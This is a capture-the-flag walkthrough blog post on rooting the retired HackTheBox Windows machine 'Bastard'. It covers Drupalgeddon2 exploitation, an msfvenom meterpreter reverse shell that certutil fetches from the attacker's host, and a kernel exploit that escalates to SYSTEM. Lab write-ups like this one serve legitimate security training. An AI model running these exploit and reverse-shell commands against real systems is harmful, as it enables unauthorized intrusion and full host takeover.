Bastard HackTheBox WalkThrough
This is Bastard HackTheBox machine walkthrough and it is also 6th machine of our OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to Bastard HTB machine.
Before starting let us know something about this machine. It is a Windows machine with IP address 10.10.10.9 and difficulty medium assigned by its maker. This machine is currently retired so you will require VIP subscription at hackthebox.eu to access this machine. Before starting, connect your PC with VPN and make sure your connectivity with Bastard machine by pinging the IP 10.10.10.9. If all goes correct then start hacking. As usual I started by scanning the machine. I used Nmap [a popular port scanner] for this task and the result is below-
Scanning
$ nmap -sC -sV -oN bastard.nmap 10.10.10.9
Nmap revealed that port 80, 135 and 49154 are open. Microsoft IIS 7 web server on port 80, Microsoft RPC service on port 135 & 49154 are running. Nmap script http-generator revealed that the website is made up of Drupal CMS [Drupal is a Content Management System as we have WordPress] and its version is 7. Soon I get any software and its version then immediately I search for public exploit using searchsploit. Searchsploit listed many number of potential exploits. However, the problem is that, there are many numbers of exploits and we do not know which exploit will surely work. For filtering the most appropriate one, I had to know the exact version of the Drupal, which is running on port 80. After some googling, found this answer from stackoverflow.
Ongoing to http://10.10.10.9/CHANGELOG.txt URL found that the installed version is 7.54.
Then again queried through searchsploit and this time it found 8 potential exploits.
$ searchsploit drupal 7.54
After trying each of them, I found only 44449.rb worked for me. For more info about this exploit, you can check here. Then, mirrored the exploit to my current directory using -m switch of searchsploit.
$ searchsploit -m php/webapps/44449.rb
Currently file 44449.rb is in DOS form so converted it into UNIX format using the command dos2unix.
$ dos2unix 44449.rb
Ran this exploit to get user shell.
Getting User Shell
$ ruby 44449.rb http://10.10.10.9
drupalgeddon2 >> whoami
Note: If you get error as shown in the screenshot. This error is due to a missing a gem named highline, in your gem directory. Therefore, to solve this problem you have to install this gem using the command $sudo gem install highline
We got a user shell by the user named iusr. Right now, we are in a fake cmd shell, which has limited functionality, and we cannot capture user flag because this shell restricts the execution of type command. So, I upgraded the shell to meterpreter shell by dropping a payload created through msfvenom, into bastard machine and then getting meterpreter shell back on my listener in msfconsole.
Upgrading Shell
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4321 -f exe>shell.exe # This will create an exe payload on our local PC$ python3 -m http.server 80 //Start python http server to host this shell.exe filedrupalgeddon2>>certutil.exe -urlcache -split -f "http://10.10.14.8/shell.exe" shell.exe # This will download the payload to bastard machine.
Started the listener on msfconsole to get the reverse shell backmsf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.8
msf5 exploit(multi/handler) > set LPORT 4321
msf5 exploit(multi/handler) > exploit
meterpreter > sysinfo
We have successfully upgraded our shell to meterpreter shell. Now we have many options to play with our meterpreter shell.
Capture User Flag
meterpreter > cat 'C:\Users\dimitris\Desktop\user.txt'
Privilege Escalation
To escalate the privilege to admin we have to first find a privilege escalation vector. Then using that PrivEsc vector we will exploit, to get admin privilege shell. To find PrivEsc vector I ran the post exploitation module post/multi/recon/local_exploit_suggester, which gathers all the exploit modules that can be used to escalate privilege. Basically, it will enumerate all the potential Kernel Exploits whose patch is not installed in the Bastard Machine.
Finding PrivEsc Vector
meterpreter > run post/multi/recon/local_exploit_suggester
Local Exploit Suggester gave 5 exploits that can be used to get admin shell. I tried each of them one by one and only exploit/windows/local/ms16_014_wmi_recv_notif module worked. So here, our PrivEsc vector is a Kernel Exploit.
Getting Root Shell
meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/ms16_014_wmi_recv_notif
msf5 exploit(windows/local/ms16_014_wmi_recv_notif)> set SESSION 1
msf5 exploit(windows/local/ms16_014_wmi_recv_notif)> set LHOST 10.10.14.8
msf5 exploit(windows/local/ms16_014_wmi_recv_notif)> exploit
meterpreter > getuid
We are NT AUTHORITY\SYSTEM. Let us capture root flag.
Capture Root Flag
meterpreter > cat /Users/Administrator/Desktop/root.txt.txt
This was how I rooted Bastard HackTheBox machine. Learnt a lot after hunting this box. Hope you people have also learnt some new things from this box. Thanks for reading this writeup. Write your experience in the comment section. For any suggestion and query related to walkthrough feel free to write us at [email protected].
Next machine walkthrough is Arctic.
